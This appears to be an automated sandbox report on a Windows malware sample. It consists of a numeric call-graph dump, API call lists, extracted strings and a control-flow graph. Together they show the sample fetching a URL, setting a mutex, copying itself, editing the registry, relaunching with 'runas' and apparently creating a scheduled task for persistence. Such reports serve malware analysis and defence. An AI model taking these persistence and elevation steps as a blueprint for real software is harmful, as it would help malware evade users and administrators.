library calls 44987->45417 44989 41b2f5 45420 4136c0 59 API calls 44989->45420 44991 41b308 45421 40ca70 59 API calls 44991->45421 44993 41b311 45422 4130b0 59 API calls 44993->45422 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45423 40c740 120 API calls 4 library calls 44996->45423 44998 412900 60 API calls 44998->45010 44999 41b327 45424 4111c0 169 API calls 2 library calls 44999->45424 45002 41b33b 45425 41ba10 LoadCursorW RegisterClassExW 45002->45425 45004 41b343 45426 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45426 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45427 410a50 65 API calls 45007->45427 45010->44989 45010->44995 45010->44998 45010->45005 45418 413580 59 API calls 45010->45418 45419 40f1f0 59 API calls 45010->45419 45011->44884 45012 41b379 45428 413100 59 API calls 45012->45428 45014 41b3a5 45429 413580 59 API calls 45014->45429 45016 41b48b 45435 41fdc0 CreateThread 45016->45435 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45430 41c330 59 API calls 45038->45430 45431 41c240 59 API calls 45038->45431 45432 41b8b0 59 API calls 45038->45432 45433 413260 59 API calls 45038->45433 45434 41fa10 CreateThread 45038->45434 45725 427e0e 45039->45725 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 9 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45087 428cec 45085->45087 45088 428d1e 45087->45088 45090 428cff 45087->45090 45091 420c62 45087->45091 45088->44757 45090->45087 45090->45088 45108 4329c9 Sleep 45090->45108 45092 420cdd 45091->45092 45100 420c6e 45091->45100 45117 42793d DecodePointer 45092->45117 45094 420ce3 45118 425208 58 API calls __getptd_noexit 45094->45118 45097 420ca1 RtlAllocateHeap 45097->45100 45107 420cd5 45097->45107 45099 420cc9 45115 425208 58 API calls __getptd_noexit 45099->45115 45100->45097 45100->45099 45104 420cc7 45100->45104 45105 420c79 45100->45105 45114 42793d DecodePointer 45100->45114 45116 425208 58 API calls __getptd_noexit 45104->45116 45105->45100 45109 427f51 58 API calls 2 library calls 45105->45109 45110 427fae 58 API calls 9 library calls 45105->45110 45111 427b0b 45105->45111 45107->45087 45108->45090 45109->45105 45110->45105 45119 427ad7 GetModuleHandleExW 45111->45119 45114->45100 45115->45104 45116->45107 45117->45094 45118->45107 45120 427af0 GetProcAddress 45119->45120 45121 427b07 ExitProcess 45119->45121 45120->45121 45122 427b02 45120->45122 45122->45121 45123->44773 45124->44768 45125->44768 45126->44776 45128 43aeb8 EncodePointer 45127->45128 45128->45128 45129 43aed2 45128->45129 45129->44780 45130->44782 45132 40cf32 _memset __ftell_nolock 45131->45132 45133 40cf4f InternetOpenW 45132->45133 45134 415c10 59 API calls 45133->45134 45135 40cf8a InternetOpenUrlW 45134->45135 45136 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45135->45136 45142 40cfb2 45135->45142 45438 4156d0 45136->45438 45138 4156d0 59 API calls 45140 40d049 45138->45140 45139 40d000 45139->45138 45140->45142 45457 413010 59 API calls 45140->45457 45142->44786 45143 40d084 45143->45142 45458 413010 59 API calls 45143->45458 45463 41ccc0 45145->45463 45483 41cc50 45148->45483 45151 41a04d 45151->44798 45151->44803 45154 413ab2 45153->45154 45162 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45153->45162 45155 413b00 45154->45155 45156 413aba 45154->45156 45491 44f23e 59 API calls 2 library calls 45155->45491 45157 423b4c 59 API calls 45156->45157 45159 413ac7 45157->45159 45159->45162 45492 44f1bb 59 API calls 3 library calls 45159->45492 45163 418400 45162->45163 45164 418437 45163->45164 45168 418446 45163->45168 45164->45168 45493 415d50 59 API calls ___crtGetEnvironmentStringsW 45164->45493 45165 4184b9 45165->44811 45168->45165 45494 418d50 59 API calls 45168->45494 45495 431781 45169->45495 45513 42f7c0 45172->45513 45175 411d20 _memset 45176 411d40 RegQueryValueExW RegCloseKey 45175->45176 45177 411d8f 45176->45177 45177->45177 45178 415c10 59 API calls 45177->45178 45179 411dbf 45178->45179 45180 411dd1 lstrlenA 45179->45180 45181 411e7c 45179->45181 45515 413520 59 API calls 45180->45515 45182 411e94 6 API calls 45181->45182 45185 411ef5 UuidCreate UuidToStringW 45182->45185 45184 411df1 45186 411e3c PathFileExistsW 45184->45186 45187 411e00 45184->45187 45188 411f36 45185->45188 45186->45181 45189 411e52 45186->45189 45187->45184 45187->45186 45188->45188 45191 415c10 59 API calls 45188->45191 45190 411e6a 45189->45190 45193 414690 59 API calls 45189->45193 45199 4121d1 45190->45199 45192 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45191->45192 45194 411f98 45192->45194 45196 411fce 45192->45196 45193->45190 45195 415c10 59 API calls 45194->45195 45195->45196 45197 415c10 59 API calls 45196->45197 45198 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45197->45198 45198->45199 45200 41207c _memset 45198->45200 45199->44840 45201 412095 6 API calls 45200->45201 45202 412115 _memset 45201->45202 45203 412109 45201->45203 45205 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45202->45205 45516 413260 59 API calls 45203->45516 45206 4121b2 45205->45206 45207 4121aa GetLastError 45205->45207 45208 4121c0 WaitForSingleObject 45206->45208 45207->45199 45208->45199 45208->45208 45210 42f7c0 __ftell_nolock 45209->45210 45211 41222d 7 API calls 45210->45211 45212 4122bd K32EnumProcesses 45211->45212 45213 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45211->45213 45214 4122d3 45212->45214 45216 4122df 45212->45216 45213->45212 45214->44814 45215 412353 45215->44814 45216->45215 45217 4122f0 OpenProcess 45216->45217 45218 412346 CloseHandle 45217->45218 45219 41230a K32EnumProcessModules 45217->45219 45218->45215 45218->45217 45219->45218 45220 41231c K32GetModuleBaseNameW 45219->45220 45517 420235 45220->45517 45222 41233e 45222->45218 45223 412345 45222->45223 45223->45218 45225 420c62 _malloc 58 API calls 45224->45225 45228 40ef6e _memset 45225->45228 45226 40efdc 45226->44819 45227 420c62 _malloc 58 API calls 45227->45228 45228->45226 45228->45227 45228->45228 45230 413f05 45229->45230 45234 413eae 45229->45234 45231 413fb1 45230->45231 45232 413f18 45230->45232 45533 44f23e 59 API calls 2 library calls 45231->45533 45235 413fbb 45232->45235 45236 413f2d 45232->45236 45237 413f3d ___crtGetEnvironmentStringsW 45232->45237 45234->45230 45241 413ed4 45234->45241 45534 44f23e 59 API calls 2 library calls 45235->45534 45236->45237 45532 416760 59 API calls 2 library calls 45236->45532 45237->44819 45243 413ed9 45241->45243 45244 413eef 45241->45244 45530 413da0 59 API calls ___crtGetEnvironmentStringsW 45243->45530 45531 413da0 59 API calls ___crtGetEnvironmentStringsW 45244->45531 45248 413ee9 45248->44819 45249 413eff 45249->44819 45251 4146a9 45250->45251 45252 41478c 45250->45252 45253 4146b6 45251->45253 45254 4146e9 45251->45254 45537 44f26c 59 API calls 3 library calls 45252->45537 45256 4146c2 45253->45256 45257 414796 45253->45257 45258 4147a0 45254->45258 45259 4146f5 45254->45259 45535 413340 59 API calls _memmove 45256->45535 45538 44f26c 59 API calls 3 library calls 45257->45538 45539 44f23e 59 API calls 2 library calls 45258->45539 45271 414707 ___crtGetEnvironmentStringsW 45259->45271 45536 416950 59 API calls 2 library calls 45259->45536 45267 4146e0 45267->44834 45271->44834 45274 40d27d CoInitializeSecurity 45273->45274 45280 40d276 45273->45280 45275 414690 59 API calls 45274->45275 45276 40d2b8 CoCreateInstance 45275->45276 45277 40d2e3 VariantInit VariantInit VariantInit VariantInit 45276->45277 45278 40da3c CoUninitialize 45276->45278 45279 40d38e VariantClear VariantClear VariantClear VariantClear 45277->45279 45278->45280 45281 40d3e2 45279->45281 45282 40d3cc CoUninitialize 45279->45282 45280->44860 45540 40b140 45281->45540 45282->45280 45285 40d3f6 45545 40b1d0 45285->45545 45287 40d422 45288 40d426 CoUninitialize 45287->45288 45289 40d43c 45287->45289 45288->45280 45290 40b140 60 API calls 45289->45290 45292 40d449 45290->45292 45293 40b1d0 SysFreeString 45292->45293 45294 40d471 45293->45294 45295 40d496 CoUninitialize 45294->45295 45296 40d4ac 45294->45296 45295->45280 45298 40b140 60 API calls 45296->45298 45353 40d8cf 45296->45353 45299 40d4d5 45298->45299 45300 40b1d0 SysFreeString 45299->45300 45301 40d4fd 45300->45301 45302 40b140 60 API calls 45301->45302 45301->45353 45303 40d5ae 45302->45303 45304 40b1d0 SysFreeString 45303->45304 45305 40d5d6 45304->45305 45306 40b140 60 API calls 45305->45306 45305->45353 45307 40d679 45306->45307 45308 40b1d0 SysFreeString 45307->45308 45309 40d6a1 45308->45309 45310 40b140 60 API calls 45309->45310 45309->45353 45311 40d6b6 45310->45311 45312 40b1d0 SysFreeString 45311->45312 45313 40d6de 45312->45313 45314 40b140 60 API calls 45313->45314 45313->45353 45315 40d707 45314->45315 45316 40b1d0 SysFreeString 45315->45316 45317 40d72f 45316->45317 45318 40b140 60 API calls 45317->45318 45317->45353 45319 40d744 45318->45319 45320 40b1d0 SysFreeString 45319->45320 45321 40d76c 45320->45321 45321->45353 45549 423aaf GetSystemTimeAsFileTime 45321->45549 45323 40d77d 45551 423551 45323->45551 45328 412c40 59 API calls 45329 40d7b5 45328->45329 45330 412900 60 API calls 45329->45330 45331 40d7c3 45330->45331 45332 40b140 60 API calls 45331->45332 45333 40d7db 45332->45333 45334 40b1d0 SysFreeString 45333->45334 45335 40d7ff 45334->45335 45336 40b140 60 API calls 45335->45336 45335->45353 45337 40d8a3 45336->45337 45338 40b1d0 SysFreeString 45337->45338 45339 40d8cb 45338->45339 45340 40b140 60 API calls 45339->45340 45339->45353 45341 40d8ea 45340->45341 45342 40b1d0 SysFreeString 45341->45342 45343 40d912 45342->45343 45343->45353 45559 40b400 SysAllocString 45343->45559 45345 40d936 VariantInit VariantInit 45346 40b140 60 API calls 45345->45346 45347 40d985 45346->45347 45348 40b1d0 SysFreeString 45347->45348 45349 40d9e7 VariantClear VariantClear VariantClear 45348->45349 45350 40da10 45349->45350 45351 40da46 CoUninitialize 45349->45351 45563 42052a 78 API calls vswprintf 45350->45563 45351->45280 45353->45278 45355->44793 45356->44837 45357->44838 45358->44874 45359->44877 45361 415c66 45360->45361 45366 415c1e 45360->45366 45362 415c76 45361->45362 45363 415cff 45361->45363 45370 415c88 ___crtGetEnvironmentStringsW 45362->45370 45719 416950 59 API calls 2 library calls 45362->45719 45720 44f23e 59 API calls 2 library calls 45363->45720 45366->45361 45371 415c45 45366->45371 45370->44881 45373 414690 59 API calls 45371->45373 45374 415c60 45373->45374 45374->44881 45375->44883 45376->44886 45377->44892 45378->44902 45380 413a90 59 API calls 45379->45380 45381 41294c MultiByteToWideChar 45380->45381 45382 418400 59 API calls 45381->45382 45383 41298d 45382->45383 45383->44905 45384->44910 45385->44918 45386->44924 45387->44928 45388->44932 45389->44936 45390->44940 45391->44944 45392->44948 45393->44950 45394->44952 45395->44954 45396->44956 45397->44958 45398->44960 45399->44962 45400->44964 45401->44966 45402->44968 45403->44970 45404->44972 45405->44974 45406->44976 45407->44978 45408->44980 45410 412c71 45409->45410 45411 412c5f 45409->45411 45414 4156d0 59 API calls 45410->45414 45412 4156d0 59 API calls 45411->45412 45413 412c6a 45412->45413 45413->44985 45415 412c8a 45414->45415 45415->44985 45416->44987 45417->45010 45418->45010 45419->45010 45420->44991 45421->44993 45422->44996 45423->44999 45424->45002 45425->45004 45426->45007 45427->45012 45428->45014 45429->45038 45430->45038 45431->45038 45432->45038 45433->45038 45434->45038 45721 41f130 218 API calls _TranslateName 45434->45721 45435->45018 45722 41fd80 64 API calls 45435->45722 45439 415735 45438->45439 45444 4156de 45438->45444 45440 4157bc 45439->45440 45441 41573e 45439->45441 45462 44f23e 59 API calls 2 library calls 45440->45462 45450 415750 ___crtGetEnvironmentStringsW 45441->45450 45461 416760 59 API calls 2 library calls 45441->45461 45444->45439 45448 415704 45444->45448 45451 415709 45448->45451 45452 41571f 45448->45452 45450->45139 45459 413ff0 59 API calls ___crtGetEnvironmentStringsW 45451->45459 45460 413ff0 59 API calls ___crtGetEnvironmentStringsW 45452->45460 45455 41572f 45455->45139 45456 415719 45456->45139 45457->45143 45458->45142 45459->45456 45460->45455 45461->45450 45469 423b4c 45463->45469 45465 41ccca 45468 41a00a 45465->45468 45479 44f1bb 59 API calls 3 library calls 45465->45479 45468->44795 45468->44796 45473 423b54 45469->45473 45470 420c62 _malloc 58 API calls 45470->45473 45471 423b6e 45471->45465 45473->45470 45473->45471 45474 423b72 std::exception::exception 45473->45474 45480 42793d DecodePointer 45473->45480 45481 430eca RaiseException 45474->45481 45476 423b9c 45482 430d91 58 API calls _free 45476->45482 45478 423bae 45478->45465 45480->45473 45481->45476 45482->45478 45484 423b4c 59 API calls 45483->45484 45485 41cc5d 45484->45485 45487 41cc64 45485->45487 45490 44f1bb 59 API calls 3 library calls 45485->45490 45487->45151 45489 41d740 59 API calls 45487->45489 45489->45151 45493->45168 45494->45168 45498 431570 45495->45498 45499 431580 45498->45499 45500 431586 45499->45500 45505 4315ae 45499->45505 45509 425208 58 API calls __getptd_noexit 45500->45509 45502 43158b 45510 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45502->45510 45506 4315cf wcstoxl 45505->45506 45511 42e883 GetStringTypeW 45505->45511 45508 41a36e lstrcpyW lstrcpyW 45506->45508 45512 425208 58 API calls __getptd_noexit 45506->45512 45508->44829 45509->45502 45510->45508 45511->45505 45512->45508 45514 411cf2 RegOpenKeyExW 45513->45514 45514->45175 45514->45199 45515->45184 45516->45202 45518 420241 45517->45518 45519 4202b6 45517->45519 45522 420266 45518->45522 45527 425208 58 API calls __getptd_noexit 45518->45527 45529 4202c8 60 API calls 3 library calls 45519->45529 45521 4202c3 45521->45222 45522->45222 45524 42024d 45528 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45524->45528 45526 420258 45526->45222 45527->45524 45528->45526 45529->45521 45530->45248 45531->45249 45532->45237 45535->45267 45536->45271 45537->45257 45538->45258 45541 423b4c 59 API calls 45540->45541 45542 40b164 45541->45542 45543 40b177 SysAllocString 45542->45543 45544 40b194 45542->45544 45543->45544 45544->45285 45546 40b1de 45545->45546 45548 40b202 45545->45548 45547 40b1f5 SysFreeString 45546->45547 45546->45548 45547->45548 45548->45287 45550 423add __aulldiv 45549->45550 45550->45323 45564 43035d 45551->45564 45553 42355a 45555 40d78f 45553->45555 45572 423576 45553->45572 45556 4228e0 45555->45556 45674 42279f 45556->45674 45560 40b423 45559->45560 45561 40b41d 45559->45561 45562 40b42d VariantClear 45560->45562 45561->45345 45562->45345 45563->45353 45605 42501f 58 API calls 4 library calls 45564->45605 45566 430369 45569 43038d 45566->45569 45606 425208 58 API calls __getptd_noexit 45566->45606 45567 430363 45567->45566 45567->45569 45571 428cde __malloc_crt 58 API calls 45567->45571 45569->45553 45570 43036e 45570->45553 45571->45566 45573 423591 45572->45573 45574 4235a9 _memset 45572->45574 45615 425208 58 API calls __getptd_noexit 45573->45615 45574->45573 45581 4235c0 45574->45581 45576 423596 45616 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45576->45616 45578 4235cb 45617 425208 58 API calls __getptd_noexit 45578->45617 45579 4235e9 45607 42fb64 45579->45607 45581->45578 45581->45579 45583 4235ee 45618 42f803 58 API calls __mbschr_l 45583->45618 45585 4235f7 45586 4237e5 45585->45586 45619 42f82d 58 API calls __mbschr_l 45585->45619 45632 4242fd 8 API calls 2 library calls 45586->45632 45589 423609 45589->45586 45620 42f857 45589->45620 45590 4237ef 45592 42361b 45592->45586 45593 423624 45592->45593 45594 42369b 45593->45594 45596 423637 45593->45596 45630 42f939 58 API calls 4 library calls 45594->45630 45627 42f939 58 API calls 4 library calls 45596->45627 45597 4236a2 45604 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 45597->45604 45631 42fbb4 58 API calls 4 library calls 45597->45631 45599 42364f 45599->45604 45628 42fbb4 58 API calls 4 library calls 45599->45628 45602 423668 45602->45604 45629 42f939 58 API calls 4 library calls 45602->45629 45604->45555 45605->45567 45606->45570 45608 42fb70 __getstream 45607->45608 45609 42fba5 __getstream 45608->45609 45610 428af7 __lock 58 API calls 45608->45610 45609->45583 45611 42fb80 45610->45611 45612 42fb93 45611->45612 45633 42fe47 45611->45633 45662 42fbab LeaveCriticalSection _doexit 45612->45662 45615->45576 45616->45604 45617->45604 45618->45585 45619->45589 45621 42f861 45620->45621 45622 42f876 45620->45622 45672 425208 58 API calls __getptd_noexit 45621->45672 45622->45592 45624 42f866 45673 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45624->45673 45626 42f871 45626->45592 45627->45599 45628->45602 45629->45604 45630->45597 45631->45604 45632->45590 45634 42fe53 __getstream 45633->45634 45635 428af7 __lock 58 API calls 45634->45635 45636 42fe71 _W_expandtime 45635->45636 45637 42f857 __tzset_nolock 58 API calls 45636->45637 45638 42fe86 45637->45638 45649 42ff25 __tzset_nolock __isindst_nolock 45638->45649 45663 42f803 58 API calls __mbschr_l 45638->45663 45641 42fe98 45641->45649 45664 42f82d 58 API calls __mbschr_l 45641->45664 45642 42ff71 GetTimeZoneInformation 45642->45649 45645 42feaa 45645->45649 45665 433f99 58 API calls 2 library calls 45645->45665 45646 42ffd8 WideCharToMultiByte 45646->45649 45648 42feb8 45666 441667 78 API calls 3 library calls 45648->45666 45649->45642 45649->45646 45650 430010 WideCharToMultiByte 45649->45650 45655 43ff8e 58 API calls __tzset_nolock 45649->45655 45660 423c2d 61 API calls UnDecorator::getTemplateArgumentList 45649->45660 45661 430157 __tzset_nolock __isindst_nolock __getstream 45649->45661 45669 4242fd 8 API calls 2 library calls 45649->45669 45670 420bed 58 API calls 2 library calls 45649->45670 45671 4300d7 LeaveCriticalSection _doexit 45649->45671 45650->45649 45653 42ff0c _strlen 45656 428cde __malloc_crt 58 API calls 45653->45656 45654 42fed9 type_info::before 45654->45649 45654->45653 45667 420bed 58 API calls 2 library calls 45654->45667 45655->45649 45658 42ff1a _strlen 45656->45658 45658->45649 45668 42c0fd 58 API calls __mbschr_l 45658->45668 45660->45649 45661->45612 45662->45609 45663->45641 45664->45645 45665->45648 45666->45654 45667->45653 45668->45649 45669->45649 45670->45649 45671->45649 45672->45624 45673->45626 45701 42019c 45674->45701 45677 4227d4 45709 425208 58 API calls __getptd_noexit 45677->45709 45679 4227d9 45710 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45679->45710 45680 4227e9 MultiByteToWideChar 45682 422804 GetLastError 45680->45682 45683 422815 45680->45683 45711 4251e7 58 API calls 3 library calls 45682->45711 45686 428cde __malloc_crt 58 API calls 45683->45686 45684 40d7a3 45684->45328 45688 42281d 45686->45688 45687 422810 45714 420bed 58 API calls 2 library calls 45687->45714 45688->45687 45689 422825 MultiByteToWideChar 45688->45689 45689->45682 45691 42283f 45689->45691 45693 428cde __malloc_crt 58 API calls 45691->45693 45692 4228a0 45715 420bed 58 API calls 2 library calls 45692->45715 45695 42284a 45693->45695 45695->45687 45712 42d51e 88 API calls 3 library calls 45695->45712 45697 422866 45697->45687 45698 42286f WideCharToMultiByte 45697->45698 45698->45687 45699 42288b GetLastError 45698->45699 45713 4251e7 58 API calls 3 library calls 45699->45713 45702 4201ad 45701->45702 45708 4201fa 45701->45708 45716 425007 58 API calls 2 library calls 45702->45716 45704 4201b3 45705 4201da 45704->45705 45717 4245dc 58 API calls 6 library calls 45704->45717 45705->45708 45718 42495e 58 API calls 6 library calls 45705->45718 45708->45677 45708->45680 45709->45679 45710->45684 45711->45687 45712->45697 45713->45687 45714->45692 45715->45684 45716->45704 45717->45705 45718->45708 45719->45370 45726 427e1a __getstream 45725->45726 45727 428af7 __lock 51 API calls 45726->45727 45728 427e21 45727->45728 45729 427eda _doexit 45728->45729 45730 427e4f DecodePointer 45728->45730 45745 427f28 45729->45745 45730->45729 45732 427e66 DecodePointer 45730->45732 45738 427e76 45732->45738 45734 427f37 __getstream 45734->45041 45736 427e83 EncodePointer 45736->45738 45737 427f1f 45739 427b0b _fast_error_exit 3 API calls 45737->45739 45738->45729 45738->45736 45740 427e93 DecodePointer EncodePointer 45738->45740 45741 427f28 45739->45741 45743 427ea5 DecodePointer DecodePointer 45740->45743 45742 427f35 45741->45742 45750 428c81 LeaveCriticalSection 45741->45750 45742->45041 45743->45738 45746 427f08 45745->45746 45747 427f2e 45745->45747 45746->45734 45749 428c81 LeaveCriticalSection 45746->45749 45751 428c81 LeaveCriticalSection 45747->45751 45749->45737 45750->45742 45751->45746
                                APIs
                                  • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                  • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                  • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                • GetLastError.KERNEL32 ref: 00419FD2
                                • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                • GetLastError.KERNEL32 ref: 00419FE4
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0067B1E0,?), ref: 0041A0BB
                                • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                  • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                  • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                  • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                • API String ID: 2957410896-3144399390
                                • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040D26C
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                • VariantInit.OLEAUT32(?), ref: 0040D309
                                • VariantInit.OLEAUT32(?), ref: 0040D322
                                • VariantInit.OLEAUT32(?), ref: 0040D33B
                                • VariantClear.OLEAUT32(?), ref: 0040D397
                                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                • CoUninitialize.OLE32 ref: 0040D3D5
                                Strings
                                Memory Dump Source
